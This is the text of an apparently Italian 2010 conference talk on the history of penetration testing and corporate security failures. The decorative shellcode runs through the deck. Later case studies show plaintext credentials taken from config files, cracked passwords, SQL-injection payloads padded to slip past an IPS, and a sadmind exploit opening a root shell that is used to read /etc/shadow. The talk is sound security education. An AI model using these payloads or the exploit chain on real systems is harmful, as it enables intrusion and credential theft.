\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, ReloadedMatteo Falsetti - mfalsetti[at]enforcer.it - fusys[at]sikurezza.org
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 2
Chi sono
ricercatore indipendente da più di quindici anni
da dieci mi occupo di penetration testing e vulnerability assessment
testimone della nascita del progetto sikurezza.org
non mi occupo (ancora) delle sole logiche aziendali
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
sicurezza, storia e parallelismi
penetration test, più di dieci anni fa
penetration test, oggi
vulnerabilità aziendali - case history
3
Agenda
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 4
A young boy, with greasy blonde hair, sitting in a dark room. The room is illuminated only by the luminescense of the C64's 40 character screen. Taking another long drag from his Benson and Hedges cigarette, the weary system cracker telnets to the next faceless ".mil" site on his hit list. "guest -- guest", "root -- root", and "system -- manager" all fail. No matter. He has all night... he pencils the host off of his list, and tiredly types in the next potential victim...
1993, Improving the Security of Your Site by Breaking Into it
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 5
However, there is a far more dangerous type of system cracker out there. One who knows the ins and outs of the latest security auditing and cracking tools, who can modify them for specific attacks, and who can write his/her own programs. One who not only reads about the latest security holes, but also personally discovers bugs and vulnerabilities. A deadly creature that can both strike poisonously and hide its tracks without a whisper or hint of a trail. The uebercracker is here.
1993, Dan Farmer e Wietse Venema
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
1983, Wargames
1988, Internet Worm
1990, Hacker Crackdown
6
Il documento del 1993 riflette una realtà ormai evidente, ma le tecniche descritte sono ancora semplicistiche; è necessario aspettare il 1995 per il paper di Mudge sugli overflow
sicurezza, storia e parallelismi (3)
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
1985, Morris
1989, Bellovin
1994 Takedown, ‘95 Joncheray, ‘96 RFC1948
2001, strani attrattori
7
la fine degli anni ’90 mostra un deciso salto qualitativo per quanto riguarda le tecniche di attacco e difesa, le pubblicazioni indipendenti, i tool e gli exploit...
sicurezza, storia e parallelismi (4)
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
10 - 12 anni per un uso mainstream dei b0f
15 anni perchè compaiano le prime metodiche di protezione sistematica
10 anni per le prime prese di posizione contro la generazione debole degli ISN
20 anni per mitigare (non risolvere) il problema del tcp spoofing
8
sicurezza, storia e parallelismi (5)
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 9
sicurezza, storia e parallelismi (6)
incidente / paper
torpore
patch / nuovi trend / nuovi incidenti
Vi ricorda qualcosa?
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 10
scoperta
rilascio patchannuncio
installazione patch
sicurezza, storia e parallelismi (6)
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
infrastrutture perimetrali(?!) semplici
poche e note implementazioni dei demoni
pochi paper, meno tool, praticamente nessuna comunità professionale online
compromissione dei sistemi con i soliti metodi
11
penetration test, più di dieci anni fa
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
password guessing
passwd theft
NSF/NIS/Telnet/FTP
world wide web? gopher e veronica, grazie
in poco tempo l’avvento dei Windows in rete darà il via alle danze SMB/CIFS
1997, su Phrack #51 fyodor presenta nmap
12
penetration test, più di dieci anni fa (2)
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
no canvas, no core impact, no metasploit, no... praticamente niente ;-p
exploit importantissimi, differenza tra PT con e senza risultati concreti
quasi totale assenza di skill specifici per i sistemi Win32
la kb personale del tester fa la differenza
1998, nasce nessus
13
penetration test, più di dieci anni fa (3)
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
gli 0-day sono rari
gli 0-day sono privati (fino a un certo punto)
gli 0-day sono preziosissimi
anche gli exploit noti sono rari, soprattutto se
multi-piattaforma, multi-architettura, multi-target
funzionanti :-p
14
penetration test, più dieci anni fa (4)
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 15
penetration test, più di dieci anni fa (5)
password exploitNFS/NIS Altro
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
the network is the computer? no, the web
http e xml il nuovo esperanto
tutto è un’applicazione web
16
penetration test, oggi
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
deployment in cluster distribuiti
complessi scenari perimetrali
virtualizzazioni e cloud computing
eterogeneità dei client
17
penetration test, oggi (2)
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
non esistono più exploit pesanti
iis, apache, ssh?
“a remote in ssh is a dead dream” (anonimo)
se esistessero non sarebbero venduti ai soliti noti commerciali (o si?!)
18
penetration test, oggi (3)
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
oggi gli exploit servono meno (con le dovute eccezioni)
strumenti come metasploit facilitano enormemente la creazione di codice di attacco
i pt richiedono altrosicurezza fisica
logiche client-side
conoscenza dell’ambiente bersaglio, delle infrastrutture, delle tecnologie
19
penetration test, oggi (4)
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
spesso i pt sonosotto-stimati
(“meglio un assessment classico”)
non compresi
(“fate quel che dovete, ma non toccate nulla, non copiate o modificate alcun dato, non impersonate utenze altrui, non aumentate il carico della macchina, non...”)
menomati da logiche aziendali estranee
(“ok i sistemi A, C e D. Il B no, perchè fa parte della linea di esercizio e sistemi, che fa capo a X. I sistemi da E a H non li testiamo perchè non siamo riusciti a contattare il referente interno Y.”)
20
penetration test, oggi (5)
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
spesso i pt sonosotto-stimati
(“meglio un assessment classico”)
non compresi
(“fate quel che dovete, ma non toccate nulla, non copiate o modificate alcun dato, non impersonate utenze altrui, non aumentate il carico della macchina, non...”)
menomati da logiche aziendali estranee
(“ok i sistemi A, C e D. Il B no, perchè fa parte della linea di esercizio e sistemi, che fa capo a X. I sistemi da E a H non li testiamo perchè non siamo riusciti a contattare il referente interno Y.”)
21
penetration test, oggi (5)
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 22
vulnerabilità aziendali - case history
vulnerabilità semplicierrori di configurazione
errori logici, di design
disattenzioni, dimenticanze
spesso più efficaci di qualunque exploit
il problema è umano (tanto più vero al crescere dell’azienda, delle policy, delle linee gerarchiche, degli screzi tra quadri/dirigenti, ...)
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 23
vulnerabilità aziendali - case history
Totti
multi-user e single-user, per me pari sono
appliance a 6 zeri
chained exploit, lotek edition
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 24
vulnerabilità aziendali - case history
Totti
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 25
vulnerabilità aziendali - case history
Totti
wmilan abc123 totti
marco9 alice1 pippo321
gandalf slamdunk Amore71
password mare19 GretA
fragolin Andrea63 mundogol
R0m4n0 capitan0 Madonna
C0ns0l3 redwine lucillA
sesso69 OKpassw wlafranc
scout441 pooh123 falcao82
rospomo Gelato!! malta99
testtest abcabc19 amendola
Adolfo65 cambiami TmP1234
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 26
vulnerabilità aziendali - case history
10 anni di password
dizionarioforza bruta 3ggnon ottenuteforza bruta 3gg
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
in media il 5% - 10% delle utenze presenta la password uguale (o simile) allo username
tutte le aziende hanno una policy per le password, poche policy sono accettate dai dipendenti, pochissime sono sicure
27
vulnerabilità aziendali - case history
Totti
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 28
vulnerabilità aziendali - case history
Totti
in media il 5% - 10% delle utenze presenta la password uguale (o simile) allo username
tutte le aziende hanno una policy per le password, poche policy sono accettate dai dipendenti, pochissime sono sicure
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
teoricamente un sistema in produzione è più pulito e controllato dell’ambiente di deployment
nella pratica, spesso non esistono repliche di collaudo e gli sviluppatori lavorano direttamente negli ambienti di produzione
29
vulnerabilità aziendali - case history
multi-user e single-user, per me pari sono
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
anni di sistemi casalinghi mono-utente hanno creato una generazione di single-user noncuranti dei privilegi del file-system
credenziali e/o informazioni sensibili nei file batch di prova
file leggibili da chiunque
nessuna separazione dei privilegi
30
vulnerabilità aziendali - case history
multi-user e single-user, per me pari sono
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 31
nagios: /opt/bea/wls93jdk/domains/XYZ/DEPLOYMENT>
[Server]Hostname=srv_VIP_bldn7.xyz.orgip=www.xxx.yyy.zzz
[Domain]env=proddomain=XYZsuff_instance=wlsrange_instance=01,02,03,adminrange_port=7001,7022,7003,9001
[Credential]username=systempassword=bmX@Bea_aDmin
more init.cfg
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
(falsema) /opt/home/oracle/DBA/PROD_SRV >
create public database link PPL_PROD.ACME.ORG connect to PPL_RO identified by aqw23nm45 using 'PPL_PROD';
more cr_public_db.sql
(falsema) /opt/home/oracle/DBA/PROD_SRV/PPL >
arch:identified by ACME06AQUA arch: IDENTIFIED BY "ppl_ro" DEFAULT TABLESPACE "OPSPPL" arch: IDENTIFIED BY "ACME2006P" DEFAULT TABLESPACE "USERZ" cr_db_link.sql: identified by ACME06AQUA cr_role_ppl_ro.sql: IDENTIFIED BY "ppl_ro" DEFAULT TABLESPACE "OPSPPL"cr_user_ppl_ro.sql: IDENTIFIED BY "IRP2006P" DEFAULT TABLESPACE "USERZ"
grep identified *
32
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
ACME-NET-Guest
dlink
PseudoRandomSSIDGenerator
shelab
Free Public WiFi
Squeeze 2
acmeMYnet
Wannabe_7941
demo Billy
Agere Systems
HFG11
hpsetup
Pronto_Network_1LDPY
beverlac419
CX2000
Mario Rossi's Network
wicked
b2
rmc_ap
PGNetwork
test02MacLeod
Tonino's Home WLAN
A97-MMCS03COMPAQ
WIRELESS
ESP7
BMX
Forest
AKU2TT-LINK
YES78
33
vulnerabilità aziendali - case history
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 34
vulnerabilità aziendali - case history
FW/IDS applicativo
grande azienda
progetto da 1 milione di EUR per la protezione e l’archiviazione delle operazioni di n database critici
stringenti policy per AAA verso l’appliance e i db
policy password
policy accesso
appliance a 6 zeri
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 35
vulnerabilità aziendali - case history
appliance a 6 zeri
due differenti modalità operative
attiva (inspect & forward)
passiva (sniffer/IDS)
logging esteso del traffico SQL
elevato throughput
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 36
vulnerabilità aziendali - case history
appliance a 6 zeri
due differenti modalità operative
attiva (inspect & forward)
passiva (sniffer/IDS)
logging esteso del traffico SQL
elevato throughput
questo dipende da una precisa scelta operata dagli sviluppatori dell’appliance in termini di capacità di sniffing dei datagrammi
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 37
vulnerabilità aziendali - case history
appliance a 6 zeri
IP
TCP
SQL
SELECT
SYSDATE FROM
DUAL
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 38
vulnerabilità aziendali - case history
appliance a 6 zeri
IP
TCP
SQL
SELECT
SYSDATE FROM
DUAL
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 39
vulnerabilità aziendali - case history
appliance a 6 zeri
IP
TCP
SQL
DROP TABLE
XYZ
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 40
vulnerabilità aziendali - case history
appliance a 6 zeri
IP
TCP
SQL
DROP TABLE
XYZ
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 41
vulnerabilità aziendali - case history
appliance a 6 zeri
IP FragmentTCP FragmentSQLDROP TABLE
XYZ
IP Fragmentation
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 42
vulnerabilità aziendali - case history
appliance a 6 zeri
D R O P
X Y
T
Z
A B L E
TCP Splicing
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 43
vulnerabilità aziendali - case history
appliance a 6 zeri
Tecnica 0-day?! Non esattamente.
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 44
appliance a 6 zeri
vulnerabilità aziendali - case history
IPS applicativo
grande azienda
tutte le applicazioni web sono protette dall’appliance
three tier architecture
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 45
appliance a 6 zeri
vulnerabilità aziendali - case history
web application assessment
XSS e SQL Injection praticamente impossibili
l’IPS filtra e/o blocca ogni input malevolo
logga ogni transazione identificata
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 46
vulnerabilità aziendali - case history
appliance a 6 zeri
IP
TCP
HTTP
GET /brandprofile/vulnus.aspx?xyz=XYZ%27%3B%20CREATE%20TABL%20sqlmapoutput(data%20varchar(8000))%3B--%20AND%20%27PLyKB%27=%27PLyKBHTTP/1.1
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 47
vulnerabilità aziendali - case history
appliance a 6 zeri
IP
TCP
HTTP
GET /brandprofile/vulnus.aspx?xyz=XYZ%27%3B%20CREATE%20TABL%20sqlmapoutput(data%20varchar(8000))%3B--%20AND%20%27PLyKB%27=%27PLyKBHTTP/1.1
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 48
vulnerabilità aziendali - case history
appliance a 6 zeri
IP
TCP
HTTP
GET /brandprofile/vulnus.aspx?foo=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&xyz=XYZ%27%3B%20CREATE%20 TABLE%20sqlmapoutput%28data%20varchar%288000%29%29%3B--%20AND%20%27PLyKB%27=%27P LyKB HTTP/1.1
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 49
vulnerabilità aziendali - case history
chained exploit, lotek edition
dominio Windows
DC1 e DC2, AD1 e AD2, 150 PDL
patch level da manuale
credenziali complesse e lock-out degli account
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 51
vulnerabilità aziendali - case history
!
0wned Domain
chained exploit, lotek edition
Password Guessing
SADMIND Exploit
Srv Enable
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 52
vulnerabilità aziendali - case history
!
0wned Domain
chained exploit, lotek edition
Password Guessing
SADMIND Exploit
Srv Enable
docfuz@giringiro $
holygrail2 vs. SunOS 5.9 sadmindby kcope in 2008binds a shell to port 5555
perl ~/xpl/sadmind.pl w.x.y.z
docfuz@giringiro $ nc w.x.y.z 5555
id
uid=0(root) gid=0(root)
grep root /etc/shadow
root:mfK7894OhtMoO:12458::::::
